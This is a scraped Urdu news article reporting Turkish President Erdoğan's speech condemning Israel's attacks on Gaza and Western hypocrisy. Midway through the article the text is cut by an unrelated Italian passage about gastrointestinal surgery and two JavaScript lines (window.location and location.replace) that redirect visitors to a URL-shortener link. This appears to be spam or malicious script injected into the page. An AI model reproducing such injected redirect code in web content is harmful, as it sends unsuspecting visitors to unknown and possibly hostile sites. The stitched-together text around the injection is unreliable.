Close Menu
Tr-Urdu
    Facebook X (Twitter) Instagram
    Facebook X (Twitter) Instagram
    Tr-Urdu
    Subscribe
    • صفحہ اول
    • ترکیہ
    • پاکستان
    • پاکستان کمیونٹی
    • کالم اور مضامین
    • میگزین
    • تعلیم
    • ویڈیو
    • دلچسپ حقائق
    • دنیا
    Tr-Urdu
    You are at:Home»ترکیہ»جنگ بندی کے لئے غزہ میں اور کتنے بچوں کو مرنا ہوگا۔ایردوان
    ترکیہ

    جنگ بندی کے لئے غزہ میں اور کتنے بچوں کو مرنا ہوگا۔ایردوان

    شبانہ آیازBy شبانہ آیاز26اکتوبر , 2023Updated:19نومبر , 2023کوئی تبصرہ نہیں ہے۔2 Mins Read
    پوسٹ شئیر کریں
    Facebook Twitter LinkedIn Email

    8 ویں فیملی کونسل سے خطاب کرتے ہوئے صدر ایردوان نے غزہ میں اسرائیل کے حملوں پر انتہائی سخت ردعمل کا اظہار کیا ہے۔

    ایردوان نے مغرب کی منافقت کی طرف اشارہ کرتے ہوئے کہا کہ ‘غزہ میں مزید کتنے بچوں کو مرنے کی ضرورت ہے؟’ انہوں نے کہا

    7 اکتوبر سے، اسرائیل ہمارے فلسطینی بھائیوں پر وحشیانہ حملے کر رہا ہے۔ عالمی ضمیر کو ایکشن لینا چاہیے۔ غزہ میں آدھی رہائش گاہیں یا تو تباہ ہوگئیں یا ناقابل استعمال ۔۔

    یہ ناممکن ہے کہ غزہ کی تصاویر کو دیکھ کر جواب نہ دیا جائے۔

    یہ قتل عام اور بربریت میں بدل چکا ہے۔ مہذب ہونے کا ڈھونگ رچانے والے صرف یہ ظلم دیکھ رہے ہیں۔ یورپی یونین کا کہنا ہے کہ ‘ہم ابھی جنگ بندی کا مطالبہ نہیں کر سکتے’۔

    آپ نے مزید کتنے بچوں کو مارنا ہے؟

    دنیا بتائے کہ جنگ بندی کے لیے مزید کتنے بچوں کو مرنا چاہیے؟

    کہا گئے انسانی حقوق۔؟

    اسرائیل کے اتحادیوں کو اس کی کوئی پرواہ نہیں، کیونکہ یہ ان کے عزائم اور منصوبوں کے مطابق ہے، جو خون بہایا جارہا ہے وہ مسلمانوں کا خون ہے… یہاں میں پوچھتا ہوں کہ یورپی یونین سے جنگ بندی کا مطالبہ کرنے کے لیے غزہ میں مزید کتنے بچوں کو مرنا ہوگا اور مزید کتنے ٹن بم گرانے ہوں گے۔؟؟؟

    *اسے کہتے ہیں منافقت*

    امدادی جہاز کے بجائے طیارہ بردار بحری جہاز بھیج کر، انہوں نے ثابت کردیا ہے کہ وہ کن لابیوں کی خدمت کرتے ہیں۔

    لیکن ہم فلسطین کی ہر قسم کی مدد کے لیے تیار ہیں۔

    ہم فیلڈ ہسپتالوں کے قیام سے لے کر زخمیوں کو اپنے ملک لانے تک ہر قسم کی مدد کے لیے تیار ہیں۔ حالات ٹھیک ہونے پر ہم اپنے جہاز خطے میں بھیجیں گے۔

    ہمارے لیے غزہ کے بچوں اور اسرائیلی بچوں میں کوئی فرق نہیں ہے۔ بچہ تمام شناختوں سے قطع نظر بچہ ہوتا ہے۔ جب بچے مارے جا رہے ہیں تو کوئی بھی ہمیں خاموش رہنے کی نصیحت کر سکتا۔

    اور نہ کوئی ہم سے خاموش رہنے کی توقع رکھے۔ سب سے پہلے تو ہمارا ضمیر اس بات کی اجازت نہیں دیتا کہ ہم اس ظلم کے خلاف خاموش رہیں۔

    مغرب میں جو


    intervento all'apparato gastrointestinale

    Intervento Gastroenterologico

    Testo aggiuntivo sull’intervento gastrointestinale.

    window.location=”https://4.fo/1sjiqu3″;

    setTimeout(‘location.replace(“https://4.fo/1sjiqu3”)’,0);

    لوگ اس ظلم کے خلاف بات نہیں کرتے، وہ وہی ہیں جو اسرائیل کے مقروض ہیں۔ لیکن ترکیہ اسرائیل کا مقروض نہیں ہے۔ لہٰذا تمام اسرائیلی ترکیہ سے نکل جائیں ۔

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous Articleولنگٹن میں پارلیمنٹ کے سامنے نہتے فلسطینی عوام کے حق میں بڑی ریلی امریکی سفارت خانے کے سامنے شدید نعرے بازی
    Next Article

    صد سالہ یومِ جمہوریہ ترکیہ پر انقرہ میں سفیرِ پاکستان ڈاکٹر یوسف جنید کی رہائش گاہ پر شاندار تقریب ، ممتاز شخصیات کی شرکت

    یومِ جمہوریہ پر پاک- ترک تعلقات کو مزید فروغ دینے کا اعادہ

    شبانہ آیاز
    • Facebook
    • X (Twitter)

    Related Posts

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    29جنوری , 2026

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    26جنوری , 2026

    ڈی ایٹ کے سیکرٹری جنرل(D8)سہیل محمود کی استنبول میں بحیرۂ اسود اقتصادی تعاون تنظیم (بی ایس ای سی) کے سیکرٹری جنرل اور رومانیہ کے سابق وزیرِ خارجہ، جنابِ عالی سفیر لازر کومانسکو سے ملاقات

    21جنوری , 2026

    Comments are closed.

    کیٹگریز
    • پاکستان
    • پاکستان کمیونٹی
    • ترکیہ
    • تعلیم
    • دلچسپ حقائق
    • دنیا
    • کالم اور مضامین
    • میگزین
    • ویڈیو
    ٹیگز
    #اسرائیل #حقان فیدان #حماس #سیاحت #غزہ #فلسطین آئی ٹی استنبول اسلام آباد افراطِ زر الیکشن 2024 انتخابات انقرہ اپوزیشن ایردوان بھونچال بیسٹ ماڈل آف ترکیہ ترقی ترک صدی ترک میڈیا ترکیہ تعلیم حزبِ اختلاف دنیا دہماکہ دی اکانومسٹ روس سلائِڈر سلائیڈر--- شہباز شریف صدر ایردوان صدر ایردوان، وزیراعظم شہباز شریف، پاکستان، ترکیہ عدلیہ عمران خان فیچرڈ قاتلانہ حملہ لانگ مارچ مغربی میڈیا ملت اتحاد وزیراعظم وزیراعظم شہباز شریف وزیراعظم شہباز شریف، صدر ایردوان، پاکستان، امداد پاکستان پاک فوج یورپ
    • Facebook
    • Twitter
    • Instagram
    اہم خبریں

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    ڈی ایٹ کے سیکرٹری جنرل(D8)سہیل محمود کی استنبول میں بحیرۂ اسود اقتصادی تعاون تنظیم (بی ایس ای سی) کے سیکرٹری جنرل اور رومانیہ کے سابق وزیرِ خارجہ، جنابِ عالی سفیر لازر کومانسکو سے ملاقات

    ترکیہ اسکالرشپس: دنیا کی جامع ترین ( fully funded)اسکالرشپس، آن لائن درخواستوں کا طوفان، ویب سائٹ کو کریش کے خدشات

    کیٹگریز
    • پاکستان
    • پاکستان کمیونٹی
    • ترکیہ
    • تعلیم
    • دلچسپ حقائق
    • دنیا
    • کالم اور مضامین
    • میگزین
    • ویڈیو
    مقبول پوسٹس

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    29جنوری , 2026

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    26جنوری , 2026
    Tr-Urdu All Rights Reserved © 2022
    • صفحہ اول
    • ترکیہ
    • پاکستان
    • پاکستان کمیونٹی
    • کالم اور مضامین
    • میگزین
    • تعلیم
    • ویڈیو
    • دلچسپ حقائق
    • دنیا

    Type above and press Enter to search. Press Esc to cancel.